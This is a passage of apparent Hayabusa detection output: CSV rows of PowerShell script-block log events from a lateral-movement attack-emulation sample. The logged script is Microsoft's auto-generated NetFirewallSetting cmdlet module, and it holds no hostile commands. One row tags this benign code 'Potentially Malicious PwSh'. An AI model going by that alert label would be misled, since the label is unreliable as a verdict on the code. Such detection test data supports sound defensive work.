[Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.893 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' -Alias '*' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, 
[Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, 
[Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) {",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.893 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and 
